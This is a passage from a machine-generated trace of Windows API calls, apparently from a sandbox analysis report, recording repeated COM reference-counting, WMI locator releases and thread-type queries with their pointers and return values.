This=0x6ee4b0, riid=0x71ddb24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36fdac | out: ppvObject=0x36fdac*=0x6ee4bc) returned 0x0 [0257.843] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ee4bc, pThreadType=0x36fe0c | out: pThreadType=0x36fe0c*=0) returned 0x0 [0257.843] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0257.845] CoGetContextToken (in: pToken=0x36fa94 | out: pToken=0x36fa94) returned 0x0 [0257.845] IUnknown:QueryInterface (in: This=0x6ee4b0, riid=0x71ddb24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36fab8 | out: ppvObject=0x36fab8*=0x6ee4bc) returned 0x0 [0257.845] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ee4bc, pThreadType=0x36fae4 | out: pThreadType=0x36fae4*=0) returned 0x0 [0257.845] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0257.852] CoGetContextToken (in: pToken=0x36fa94 | out: pToken=0x36fa94) returned 0x0 [0257.852] IUnknown:QueryInterface (in: This=0x6ee4b0, riid=0x71ddb24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36fab8 | out: ppvObject=0x36fab8*=0x6ee4bc) returned 0x0 [0257.852] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ee4bc, pThreadType=0x36fae4 | out: pThreadType=0x36fae4*=0) returned 0x0 [0257.852] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0258.048] CoGetContextToken (in: pToken=0x36fa94 | out: pToken=0x36fa94) returned 0x0 [0258.048] IUnknown:QueryInterface (in: This=0x6ee4b0, riid=0x71ddb24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36fab8 | out: ppvObject=0x36fab8*=0x6ee4bc) returned 0x0 [0258.048] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ee4bc, pThreadType=0x36fae4 | out: pThreadType=0x36fae4*=0) returned 0x0 [0258.048] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0258.581] CoGetContextToken (in: pToken=0x36fa94 | out: pToken=0x36fa94) returned 0x0 [0258.581] IUnknown:QueryInterface (in: This=0x6ee4b0, riid=0x71ddb24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36fab8 | out: ppvObject=0x36fab8*=0x6ee4bc) returned 0x0 [0258.581] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ee4bc, pThreadType=0x36fae4 | out: pThreadType=0x36fae4*=0) returned 0x0 [0258.581] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0258.777] CoGetContextToken (in: pToken=0x36fa94 | out: pToken=0x36fa94) returned 0x0 [0258.777] IUnknown:QueryInterface (in: This=0x6ee4b0, riid=0x71ddb24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36fab8 | out: ppvObject=0x36fab8*=0x6ee4bc) returned 0x0 [0258.777] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ee4bc, pThreadType=0x36fae4 | out: pThreadType=0x36fae4*=0) returned 0x0 [0258.777] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0258.826] CoGetContextToken (in: pToken=0x36fab4 | out: pToken=0x36fab4) returned 0x0 [0258.826] IUnknown:QueryInterface (in: This=0x6ee4b0, riid=0x71ddb24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36fad8 | out: ppvObject=0x36fad8*=0x6ee4bc) returned 0x0 [0258.826] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ee4bc, pThreadType=0x36fb04 | out: pThreadType=0x36fb04*=0) returned 0x0 [0258.826] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0258.943] CoUninitialize () Thread: id = 101 os_tid = 0xecc Thread: id = 102 os_tid = 0xed0 [0146.271] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0189.669] CoGetContextToken (in: pToken=0x211f894 | out: pToken=0x211f894) returned 0x0 [0189.669] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0189.669] WbemLocator:IUnknown:Release (This=0x769378) returned 0x1 [0189.669] WbemLocator:IUnknown:Release (This=0x769378) returned 0x0 [0189.669] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0189.669] IUnknown:Release (This=0x7925a8) returned 0x2 [0189.669] IUnknown:Release (This=0x7925a8) returned 0x1 [0189.669] IUnknown:Release (This=0x7925a8) returned 0x0 [0189.669] RegCloseKey (hKey=0x2c8) returned 0x0 [0189.670] RegCloseKey (hKey=0x2c4) returned 0x0 [0192.841] CoGetContextToken (in: pToken=0x211f894 | out: pToken=0x211f894) returned 0x0 [0192.841] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0192.841] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x1 [0192.841] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x0 [0192.842] CoGetContextToken (in: pToken=0x211f894 | out: pToken=0x211f894) returned 0x0 [0192.842] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0192.842] WbemLocator:IUnknown:Release (This=0x712588) returned 0x1 [0192.842] WbemLocator:IUnknown:Release (This=0x712588) returned 0x0 [0192.879] IUnknown:Release (This=0x6ee4b0) returned 0x0 [0193.636] GdipDisposeImage (image=0x9d2230) returned 0x0 [0216.808] CoGetContextToken (in: pToken=0x211f894 | out: pToken=0x211f894) returned 0x0 [0216.808] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.808] IUnknown:Release (This=0x5e88a80) returned 0x2 [0216.808] IUnknown:Release (This=0x5e88a80) returned 0x1 [0216.808] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.808] WbemLocator:IUnknown:Release (This=0x5e890b0) returned 0x1 [0216.808] WbemLocator:IUnknown:Release (This=0x5e890b0) returned 0x0 [0216.808] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.808] IUnknown:Release (This=0x5e88ca8) returned 0x2 [0216.808] IUnknown:Release (This=0x5e88ca8) returned 0x1 [0216.808] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.808] WbemLocator:IUnknown:Release (This=0x769418) returned 0x1 [0216.808] WbemLocator:IUnknown:Release (This=0x769418) returned 0x0 [0216.808] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.808] WbemLocator:IUnknown:Release (This=0x5e89170) returned 0x1 [0216.808] WbemLocator:IUnknown:Release (This=0x5e89170) returned 0x0 [0216.808] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.808] IUnknown:Release (This=0x5e8a320) returned 0x2 [0216.808] IUnknown:Release (This=0x5e8a320) returned 0x1 [0216.808] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.808] WbemLocator:IUnknown:Release (This=0x5e890f0) returned 0x1 [0216.808] WbemLocator:IUnknown:Release (This=0x5e890f0) returned 0x0 [0216.808] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.808] WbemLocator:IUnknown:Release (This=0x792d88) returned 0x1 [0216.809] WbemLocator:IUnknown:Release (This=0x792d88) returned 0x0 [0216.865] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.866] WbemLocator:IUnknown:Release (This=0x5e891b0) returned 0x1 [0216.866] WbemLocator:IUnknown:Release (This=0x5e891b0) returned 0x0 [0216.866] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.866] WbemLocator:IUnknown:Release (This=0x792e78) returned 0x1 [0216.866] WbemLocator:IUnknown:Release (This=0x792e78) returned 0x0 [0216.866] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.866] WbemLocator:IUnknown:Release (This=0x5e89210) returned 0x1 [0216.866] WbemLocator:IUnknown:Release (This=0x5e89210) returned 0x0 [0216.866] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.866] WbemLocator:IUnknown:Release (This=0x792f68) returned 0x1 [0216.866] WbemLocator:IUnknown:Release (This=0x792f68) returned 0x0 [0216.867] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.867] WbemLocator:IUnknown:Release (This=0x5e89270) returned 0x1 [0216.867] WbemLocator:IUnknown:Release (This=0x5e89270) returned 0x0 [0216.867] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.867] WbemLocator:IUnknown:Release (This=0x793058) returned 0x1 [0216.867] WbemLocator:IUnknown:Release (This=0x793058) returned 0x0 [0216.867] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.867] WbemLocator:IUnknown:Release (This=0x5e892d0) returned 0x1 [0216.867] WbemLocator:IUnknown:Release (This=0x5e892d0) returned 0x0 [0216.868] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.868] IUnknown:Release (This=0x5e8fdf8) returned 0x2 [0216.868] IUnknown:Release (This=0x5e8fdf8) returned 0x1 [0216.868] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.868] WbemLocator:IUnknown:Release (This=0x5e89330) returned 0x1 [0216.868] WbemLocator:IUnknown:Release (This=0x5e89330) returned 0x0 [0216.868] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.868] WbemLocator:IUnknown:Release (This=0x793328) returned 0x1 [0216.868] WbemLocator:IUnknown:Release (This=0x793328) returned 0x0 [0216.868] CoGetContextToken (in: pToken=0x211f894 | out: pToken=0x211f894) returned 0x0 [0216.868] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.868] WbemDefPath:IUnknown:Release (This=0x768dd8) returned 0x1 [0216.868] WbemDefPath:IUnknown:Release (This=0x768dd8) returned 0x0 [0216.868] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.869] WbemDefPath:IUnknown:Release (This=0x768e48) returned 0x1 [0216.869] WbemDefPath:IUnknown:Release (This=0x768e48) returned 0x0 [0216.869] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.869] WbemDefPath:IUnknown:Release (This=0x768eb8) returned 0x1 [0216.869] WbemDefPath:IUnknown:Release (This=0x768eb8) returned 0x0 [0216.869] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.869] WbemDefPath:IUnknown:Release (This=0x768f28) returned 0x1 [0216.869] WbemDefPath:IUnknown:Release (This=0x768f28) returned 0x0 [0216.869] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0216.869] WbemDefPath:IUnknown:Release (This=0x769078) returned 0x1 [0216.869] WbemDefPath:IUnknown:Release (This=0x769078) returned 0x0 [0216.869] IUnknown:Release (This=0x5e88ca8) returned 0x0 [0216.869] IUnknown:Release (This=0x5e88a80) returned 0x0 [0216.869] IUnknown:Release (This=0x5e8a320) returned 0x0 [0216.869] IUnknown:Release (This=0x5e8fdf8) returned 0x0 [0217.529] CoGetContextToken (in: pToken=0x211f894 | out: pToken=0x211f894) returned 0x0 [0217.529] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0217.529] WbemDefPath:IUnknown:Release (This=0x768cf8) returned 0x1 [0217.529] WbemDefPath:IUnknown:Release (This=0x768cf8) returned 0x0 [0217.529] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0217.529] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x1 [0217.529] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x0 [0217.529] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0217.529] WbemDefPath:IUnknown:Release (This=0x768c18) returned 0x1 [0217.529] WbemDefPath:IUnknown:Release (This=0x768c18) returned 0x0 [0217.529] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0217.529] WbemDefPath:IUnknown:Release (This=0x768d68) returned 0x1 [0217.529] WbemDefPath:IUnknown:Release (This=0x768d68) returned 0x0 [0217.529] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0217.529] WbemDefPath:IUnknown:Release (This=0x768f98) returned 0x1 [0217.529] WbemDefPath:IUnknown:Release (This=0x768f98) returned 0x0 [0217.529] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0217.529] WbemDefPath:IUnknown:Release (This=0x769008) returned 0x1 [0217.529] WbemDefPath:IUnknown:Release (This=0x769008) returned 0x0 [0217.529] CoGetContextToken (in: pToken=0x211f894 | out: pToken=0x211f894) returned 0x0 [0217.530] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0217.530] WbemLocator:IUnknown:Release (This=0x792ab8) returned 0x1 [0217.530] WbemLocator:IUnknown:Release (This=0x792ab8) returned 0x0 [0217.569] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0217.569] WbemLocator:IUnknown:Release (This=0x712588) returned 0x1 [0217.569] WbemLocator:IUnknown:Release (This=0x712588) returned 0x0 [0217.569] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0217.570] WbemLocator:IUnknown:Release (This=0x792a68) returned 0x1 [0217.570] WbemLocator:IUnknown:Release (This=0x792a68) returned 0x0 [0217.570] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0217.570] WbemLocator:IUnknown:Release (This=0x793148) returned 0x1 [0217.570] WbemLocator:IUnknown:Release (This=0x793148) returned 0x0 [0217.570] IUnknown:Release (This=0x6ee4b0) returned 0x0 [0225.746] CoGetContextToken (in: pToken=0x211f894 | out: pToken=0x211f894) returned 0x0 [0225.747] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.747] IUnknown:Release (This=0x743098) returned 0x2 [0225.747] IUnknown:Release (This=0x743098) returned 0x1 [0225.747] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.747] IUnknown:Release (This=0x742f00) returned 0x2 [0225.747] IUnknown:Release (This=0x742f00) returned 0x1 [0225.747] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.747] IUnknown:Release (This=0x6d7a30) returned 0x2 [0225.747] IUnknown:Release (This=0x6d7a30) returned 0x1 [0225.747] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.747] IUnknown:Release (This=0x7492f8) returned 0x2 [0225.747] IUnknown:Release (This=0x7492f8) returned 0x1 [0225.747] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.747] IUnknown:Release (This=0x742d68) returned 0x2 [0225.747] IUnknown:Release (This=0x742d68) returned 0x1 [0225.747] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.747] IUnknown:Release (This=0x742bd0) returned 0x2 [0225.747] IUnknown:Release (This=0x742bd0) returned 0x1 [0225.747] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.747] IUnknown:Release (This=0x742a38) returned 0x2 [0225.747] IUnknown:Release (This=0x742a38) returned 0x1 [0225.747] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.747] IUnknown:Release (This=0x5e8d550) returned 0x2 [0225.747] IUnknown:Release (This=0x5e8d550) returned 0x1 [0225.747] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.747] IUnknown:Release (This=0x7428a0) returned 0x2 [0225.747] IUnknown:Release (This=0x7428a0) returned 0x1 [0225.747] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.747] IUnknown:Release (This=0x742708) returned 0x2 [0225.747] IUnknown:Release (This=0x742708) returned 0x1 [0225.748] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.748] IUnknown:Release (This=0x742570) returned 0x2 [0225.748] IUnknown:Release (This=0x742570) returned 0x1 [0225.748] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.748] IUnknown:Release (This=0x7423d8) returned 0x2 [0225.748] IUnknown:Release (This=0x7423d8) returned 0x1 [0225.748] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.748] IUnknown:Release (This=0x5e8b638) returned 0x2 [0225.748] IUnknown:Release (This=0x5e8b638) returned 0x1 [0225.748] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.748] IUnknown:Release (This=0x5e8b1c0) returned 0x2 [0225.748] IUnknown:Release (This=0x5e8b1c0) returned 0x1 [0225.748] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.748] IUnknown:Release (This=0x5e924c8) returned 0x2 [0225.748] IUnknown:Release (This=0x5e924c8) returned 0x1 [0225.748] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.748] IUnknown:Release (This=0x5e92058) returned 0x2 [0225.748] IUnknown:Release (This=0x5e92058) returned 0x1 [0225.748] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.748] IUnknown:Release (This=0x5e913f0) returned 0x2 [0225.748] IUnknown:Release (This=0x5e913f0) returned 0x1 [0225.748] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.748] IUnknown:Release (This=0x5e90f88) returned 0x2 [0225.748] IUnknown:Release (This=0x5e90f88) returned 0x1 [0225.748] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.748] IUnknown:Release (This=0x5e90af0) returned 0x2 [0225.748] IUnknown:Release (This=0x5e90af0) returned 0x1 [0225.748] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.748] IUnknown:Release (This=0x5e90678) returned 0x2 [0225.748] IUnknown:Release (This=0x5e90678) returned 0x1 [0225.748] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.749] IUnknown:Release (This=0x5e89a70) returned 0x2 [0225.749] IUnknown:Release (This=0x5e89a70) returned 0x1 [0225.749] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.749] WbemLocator:IUnknown:Release (This=0x769448) returned 0x1 [0225.749] WbemLocator:IUnknown:Release (This=0x769448) returned 0x0 [0225.749] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.749] IUnknown:Release (This=0x5e94d28) returned 0x2 [0225.749] IUnknown:Release (This=0x5e94d28) returned 0x1 [0225.749] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.749] IUnknown:Release (This=0x5e86310) returned 0x2 [0225.749] IUnknown:Release (This=0x5e86310) returned 0x1 [0225.749] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.749] IUnknown:Release (This=0x796e90) returned 0x2 [0225.749] IUnknown:Release (This=0x796e90) returned 0x1 [0225.749] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.749] IUnknown:Release (This=0x743230) returned 0x2 [0225.749] IUnknown:Release (This=0x743230) returned 0x1 [0225.749] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.749] IUnknown:Release (This=0x7433c8) returned 0x2 [0225.749] IUnknown:Release (This=0x7433c8) returned 0x1 [0225.749] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.749] IUnknown:Release (This=0x743560) returned 0x2 [0225.749] IUnknown:Release (This=0x743560) returned 0x1 [0225.749] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.749] IUnknown:Release (This=0x7436f8) returned 0x2 [0225.749] IUnknown:Release (This=0x7436f8) returned 0x1 [0225.749] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.749] IUnknown:Release (This=0x743890) returned 0x2 [0225.749] IUnknown:Release (This=0x743890) returned 0x1 [0225.749] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.750] IUnknown:Release (This=0x743a28) returned 0x2 [0225.750] IUnknown:Release (This=0x743a28) returned 0x1 [0225.750] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.750] IUnknown:Release (This=0x743bc0) returned 0x2 [0225.750] IUnknown:Release (This=0x743bc0) returned 0x1 [0225.750] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.750] IUnknown:Release (This=0x5ebb200) returned 0x2 [0225.750] IUnknown:Release (This=0x5ebb200) returned 0x1 [0225.750] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.750] IUnknown:Release (This=0x5ebb398) returned 0x2 [0225.750] IUnknown:Release (This=0x5ebb398) returned 0x1 [0225.750] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.750] IUnknown:Release (This=0x5ebb530) returned 0x2 [0225.750] IUnknown:Release (This=0x5ebb530) returned 0x1 [0225.750] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.750] IUnknown:Release (This=0x5ebb6c8) returned 0x2 [0225.750] IUnknown:Release (This=0x5ebb6c8) returned 0x1 [0225.750] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.750] IUnknown:Release (This=0x5ebb860) returned 0x2 [0225.750] IUnknown:Release (This=0x5ebb860) returned 0x1 [0225.750] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.750] IUnknown:Release (This=0x5ebb9f8) returned 0x2 [0225.750] IUnknown:Release (This=0x5ebb9f8) returned 0x1 [0225.750] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.750] IUnknown:Release (This=0x5ebbb90) returned 0x2 [0225.750] IUnknown:Release (This=0x5ebbb90) returned 0x1 [0225.750] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.750] IUnknown:Release (This=0x5ebbd28) returned 0x2 [0225.750] IUnknown:Release (This=0x5ebbd28) returned 0x1 [0225.750] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.750] IUnknown:Release (This=0x5ebbec0) returned 0x2 [0225.751] IUnknown:Release (This=0x5ebbec0) returned 0x1 [0225.751] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.751] IUnknown:Release (This=0x5ebc058) returned 0x2 [0225.751] IUnknown:Release (This=0x5ebc058) returned 0x1 [0225.751] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.751] IUnknown:Release (This=0x5ebc1f0) returned 0x2 [0225.751] IUnknown:Release (This=0x5ebc1f0) returned 0x1 [0225.751] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.751] IUnknown:Release (This=0x5ebc388) returned 0x2 [0225.751] IUnknown:Release (This=0x5ebc388) returned 0x1 [0225.751] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.751] IUnknown:Release (This=0x5ebc520) returned 0x2 [0225.751] IUnknown:Release (This=0x5ebc520) returned 0x1 [0225.751] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.751] IUnknown:Release (This=0x5ebc6b8) returned 0x2 [0225.751] IUnknown:Release (This=0x5ebc6b8) returned 0x1 [0225.751] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.751] IUnknown:Release (This=0x5ebc850) returned 0x2 [0225.751] IUnknown:Release (This=0x5ebc850) returned 0x1 [0225.751] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.751] IUnknown:Release (This=0x5ebc9e8) returned 0x2 [0225.751] IUnknown:Release (This=0x5ebc9e8) returned 0x1 [0225.751] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.751] IUnknown:Release (This=0x5ebcb80) returned 0x2 [0225.751] IUnknown:Release (This=0x5ebcb80) returned 0x1 [0225.751] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.751] IUnknown:Release (This=0x5ebcd18) returned 0x2 [0225.751] IUnknown:Release (This=0x5ebcd18) returned 0x1 [0225.751] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.751] IUnknown:Release (This=0x5ebceb0) returned 0x2 [0225.751] IUnknown:Release (This=0x5ebceb0) returned 0x1 [0225.752] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.752] IUnknown:Release (This=0x5ebd048) returned 0x2 [0225.752] IUnknown:Release (This=0x5ebd048) returned 0x1 [0225.752] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.752] IUnknown:Release (This=0x5eccc40) returned 0x2 [0225.752] IUnknown:Release (This=0x5eccc40) returned 0x1 [0225.752] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.752] IUnknown:Release (This=0x5eccdd8) returned 0x2 [0225.752] IUnknown:Release (This=0x5eccdd8) returned 0x1 [0225.752] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.752] IUnknown:Release (This=0x5eccf70) returned 0x2 [0225.752] IUnknown:Release (This=0x5eccf70) returned 0x1 [0225.752] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.752] IUnknown:Release (This=0x5ecd108) returned 0x2 [0225.752] IUnknown:Release (This=0x5ecd108) returned 0x1 [0225.752] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.752] IUnknown:Release (This=0x5ecd2a0) returned 0x2 [0225.752] IUnknown:Release (This=0x5ecd2a0) returned 0x1 [0225.752] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.752] IUnknown:Release (This=0x5ecd438) returned 0x2 [0225.752] IUnknown:Release (This=0x5ecd438) returned 0x1 [0225.752] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.752] IUnknown:Release (This=0x5ecd5d0) returned 0x2 [0225.752] IUnknown:Release (This=0x5ecd5d0) returned 0x1 [0225.752] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.752] IUnknown:Release (This=0x5ecd768) returned 0x2 [0225.752] IUnknown:Release (This=0x5ecd768) returned 0x1 [0225.752] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.752] IUnknown:Release (This=0x5ecd900) returned 0x2 [0225.752] IUnknown:Release (This=0x5ecd900) returned 0x1 [0225.753] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.753] IUnknown:Release (This=0x5ecda98) returned 0x2 [0225.753] IUnknown:Release (This=0x5ecda98) returned 0x1 [0225.753] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.753] IUnknown:Release (This=0x5ecdc30) returned 0x2 [0225.753] IUnknown:Release (This=0x5ecdc30) returned 0x1 [0225.753] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.753] IUnknown:Release (This=0x5ecddc8) returned 0x2 [0225.753] IUnknown:Release (This=0x5ecddc8) returned 0x1 [0225.753] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.753] IUnknown:Release (This=0x5ecdf60) returned 0x2 [0225.753] IUnknown:Release (This=0x5ecdf60) returned 0x1 [0225.753] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.753] IUnknown:Release (This=0x5ece0f8) returned 0x2 [0225.753] IUnknown:Release (This=0x5ece0f8) returned 0x1 [0225.753] CoGetContextToken (in: pToken=0x211f818 | out: pToken=0x211f818) returned 0x0 [0225.753] 